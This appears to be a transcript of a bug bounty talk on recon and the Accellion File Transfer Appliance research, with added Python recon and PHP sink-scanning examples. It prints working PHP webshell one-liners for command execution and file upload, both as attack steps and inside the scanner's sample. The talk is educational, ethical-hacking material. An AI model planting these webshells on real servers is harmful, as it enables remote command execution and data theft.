How To Find 0day Vulnerability

This document discusses bug bounty programs and ethical hacking. It provides information on popular bug bounty platforms, common vulnerabilities found, and strategies for conducting reconnaissance and testing applications. Specific examples are given of vulnerabilities found in the Accellion File Transfer Appliance, including cross-site scripting, SQL injection, and privilege escalation issues. Benefits to ethical hackers are highlighted such as monetary rewards, recognition, and career opportunities. The document argues that bug bounty programs provide value to customers through cost savings compared to full-time penetration testing, while also allowing hackers to work flexibly from anywhere in the world.

Presented by: Anis Kothia

How many of you know about bug bounties?

How many platforms are available for real-time hacking?
How many of you know about CVEs?
How many organizations provide bug bounties?
How big is the bug bounty industry?
Real-time experience
Best learning curve
Your research can be applied in real time
You earn money, you get a CVE and you get a job.
Information Gathering: public data exposed on the web
Network Boundary
When I was doing some recon and research, not only did I look up the
domain names of Facebook itself, but I also tried Reverse Whois. And to my
surprise, I found an INTERESTING domain name: tfbnw.net
It looked like TFBNW was an internal domain name for Facebook. Let's try to
enumerate the C class IPs of vpn.tfbnw.net. I found some interesting
servers, for example: files.fb.com
The script below automates this step: it resolves a wordlist of candidate
subdomains against the target domain, keeps the names that have an A record,
and derives the target's IP addresses and /24 network ranges from them.

#!/bin/bash
# Resolve every candidate label against the target domain in parallel and
# keep "name has address ip" answers as "name ip" (fields 1 and 4).
while read -r name; do
  host "$name.customername.com" | grep "has address" | cut -d" " -f1,4 &
done < subdomains-10000.txt > subdomain.txt
wait   # let the backgrounded lookups finish before reading their output
# Unique IP addresses, then the unique /24 prefixes they fall in.
cut -d" " -f2 subdomain.txt | sort -u > subdomainip.txt
cut -d"." -f1,2,3 subdomainip.txt | sort -u > subnetwork.txt
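The same post-processing in Python, as an added example that is not part of the original slides. It runs offline on a constructed set of `host` answers (example.com and RFC 5737 documentation addresses are placeholders), reproduces the script's unique-IP and /24 lists, and adds the check a practitioner needs before trusting either: if the zone has a wildcard DNS record, every name in the wordlist "resolves" to the same address, so answers returned for random, non-existent labels are dropped first.

```python
"""Recon post-processing: unique IPs and /24 networks from `host` output,
with wildcard-DNS answers filtered out.

Added example, not code from the original slides. Hostnames and addresses
are constructed placeholders (example.com, RFC 5737 documentation ranges).
"""
import ipaddress
from collections import defaultdict

# Constructed sample standing in for `host $name.example.com` output.
SAMPLE_HOST_OUTPUT = [
    "www.example.com has address 203.0.113.10",
    "mail.example.com has address 203.0.113.25",
    "mail.example.com mail is handled by 10 mx.example.com.",  # not an A record
    "vpn.example.com has address 198.51.100.7",
    "files.example.com has address 198.51.100.8",
    "dev.example.com has address 198.51.100.8",               # second name, same host
    "asdf9x.example.com has address 192.0.2.1",               # random label: wildcard
    "zzqq17.example.com has address 192.0.2.1",               # random label: wildcard
]
# Random labels resolved before the wordlist run; a wildcard record answers them.
PROBE_NAMES = {"asdf9x.example.com", "zzqq17.example.com"}


def parse_host_output(lines):
    """Keep only 'name has address ip' lines and return (name, ip) pairs.

    This is what the `grep "has address" | cut -d" " -f1,4` pipeline does."""
    pairs = []
    for line in lines:
        parts = line.split()
        if len(parts) >= 4 and parts[1:3] == ["has", "address"]:
            pairs.append((parts[0], parts[3]))
    return pairs


def wildcard_ips(pairs, probe_names):
    """Addresses returned for names that should not exist. With a wildcard
    record every wordlist entry resolves to these, so they say nothing about
    real hosts and must be dropped before building the IP list."""
    return {ip for name, ip in pairs if name in probe_names}


def summarize(pairs, wildcard=frozenset(), prefixlen=24):
    """Unique non-wildcard IPs, plus each /prefixlen network with the
    hostnames seen in it (the script's subdomainip.txt and subnetwork.txt)."""
    ips = set()
    hosts_by_net = defaultdict(set)
    for name, ip in pairs:
        if ip in wildcard:
            continue
        addr = ipaddress.ip_address(ip)
        ips.add(addr)
        net = ipaddress.ip_interface(f"{ip}/{prefixlen}").network
        hosts_by_net[net].add(name)
    by_version = lambda n: (n.version, n)  # keeps v4/v6 sortable together
    return {
        "ips": [str(a) for a in sorted(ips, key=by_version)],
        "networks": {str(n): sorted(hosts_by_net[n])
                     for n in sorted(hosts_by_net, key=by_version)},
    }


if __name__ == "__main__":
    pairs = parse_host_output(SAMPLE_HOST_OUTPUT)
    noise = wildcard_ips(pairs, PROBE_NAMES)
    result = summarize(pairs, noise)
    print("wildcard answers dropped:", sorted(noise))
    for net, hosts in result["networks"].items():
        print(net, ", ".join(hosts))
```

In a live run, `PROBE_NAMES` would be a few random labels resolved before the wordlist; any address they return is a wildcard answer and every wordlist hit on that address is noise, not a host.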
Accellion File Transfer Appliance vulnerabilities
The FTA product's web-based user interface was mainly composed of Perl and
PHP.
The PHP source code was encrypted with IonCube.
Fortunately, the IonCube version used by FTA was not up to date and could
be decrypted with ready-made tools.
The researcher found 7 vulnerabilities:
3 Cross-Site Scripting
Pre-Auth SQL Injection leading to Remote Code Execution
Known-Secret-Key leading to Remote Code Execution
2 Local Privilege Escalation
Benefit to this hacker:
1-2 weeks of work, and he earned $10,000 from Facebook
Recognized in the Facebook bug bounty hall of fame
Gained popularity and improved his own brand image in the world of
information security
Find the network range and find a weak machine of the target
Check whether a ready-made exploit is available on CVE sites or in Metasploit
If black-box testing gives no result, go for white-box testing
Find the source code of the product
Decrypt the source code if required
Code review and debugging on a local system
Prepare the exploitation based on the limitations set on the server (e.g. shellcode,
webshell, or upload a malicious image with hidden code)
Install the application on a VM and verify the vulnerability before trying it on the
target (if the exploitation takes the server down, that would be unethical)
Try your exploitation on the target
Report the vulnerability
If it is a 0day vulnerability, report it to the product team and to a site that
provides CVEs.
wget https://files.fb.com/courier/B3dKe9sQaa0L.log
Webshell (command execution): <?php echo shell_exec($_GET['c']); ?>
Webshell (file upload): <?php move_uploaded_file($_FILES["f"]["tmp_name"],
basename($_FILES["f"]["name"])); ?>
Webshell (known secret key): <?php include_once("/home/seos/courier/remote.inc"); echo
decrypt($_GET["c"]); ?>
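Once the source is decrypted, the first pass of the code review step is usually a sink hunt: find the calls that run commands, include files, write uploads or execute queries, and check whether request input reaches them. The scanner below is an added example, not code from the slides or from the FTA research. It runs over a constructed PHP sample that mixes benign lines with the three webshell one-liners above; `only_tainted` limits hits to lines where a PHP superglobal appears in the same statement, and the sample shows why that is only a starting point.

```python
"""First-pass sink hunt over decrypted PHP source.

Added example, not code from the slides or the FTA research. SAMPLE_PHP is
a constructed file mixing benign code with the webshell one-liners above.
"""
import re

# Calls worth a look, grouped by what a hit means.
SINKS = {
    "command": re.compile(r"\b(?:shell_exec|exec|system|passthru|popen|proc_open)\s*\("),
    "eval": re.compile(r"\b(?:eval|assert|create_function)\s*\("),
    "include": re.compile(r"\b(?:include|include_once|require|require_once)\b"),
    "file": re.compile(r"\b(?:move_uploaded_file|file_put_contents|fwrite|copy|unlink)\s*\("),
    "sql": re.compile(r"\b(?:mysql_query|mysqli_query|pg_query)\s*\(|->query\s*\("),
}
# Attacker-controlled input in PHP.
SOURCES = re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE|FILES|SERVER)\b|php://input")

SAMPLE_PHP = r'''<?php
// constructed sample: benign lines mixed with the webshell primitives
$log = shell_exec("df -h");
echo shell_exec($_GET['c']);
move_uploaded_file($_FILES["f"]["tmp_name"], basename($_FILES["f"]["name"]));
include_once("/home/seos/courier/remote.inc");
echo decrypt($_GET["c"]);
$q = "SELECT * FROM users WHERE id=" . $_REQUEST["id"];
$res = mysqli_query($db, $q);
?>'''


def find_sinks(php_source, only_tainted=True):
    """Return (lineno, kind, tainted, code) for each line that calls a sink.

    tainted means a request superglobal appears on the same line. That is a
    first filter only: in the sample, line 9 runs a query built from
    $_REQUEST two lines earlier and is missed unless only_tainted=False,
    and line 7 (decrypt of attacker data under a known key) matches no
    sink at all. Both need the manual review and local debugging the slides
    call for."""
    hits = []
    for lineno, line in enumerate(php_source.splitlines(), 1):
        for kind, pattern in SINKS.items():
            if pattern.search(line):
                tainted = SOURCES.search(line) is not None
                if tainted or not only_tainted:
                    hits.append((lineno, kind, tainted, line.strip()))
    return hits


if __name__ == "__main__":
    for lineno, kind, tainted, code in find_sinks(SAMPLE_PHP, only_tainted=False):
        flag = "TAINTED" if tainted else "review "
        print(f"{flag} line {lineno:>3} [{kind}] {code}")
```

Run with `only_tainted=True` to get the short list to try first (here the command and upload webshells); run with `only_tainted=False` to get every sink, which is the list to walk through in the debugger when the tainted pass comes up empty.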
Win-Win for Customer and Ethical Hacker
Customers do not hire a full-time pen tester or red team, hence they save money
Customers pay for each bug that surfaces, hence it is not per-hour payment
but per-bug payment
Ethical hacker
Can work from anywhere in the world
Can work at any time of day (many white hat hackers have a full-time job and
do bug bounty part time)
Can choose any customer they want based on their expertise
Trust Factor
The US Department of Defense has also recently joined a bug bounty program,
which shows the trust that organizations place in these bug bounty platforms.
The pen testing industry is slowly adopting a "let the best man win" strategy (fair
game play)
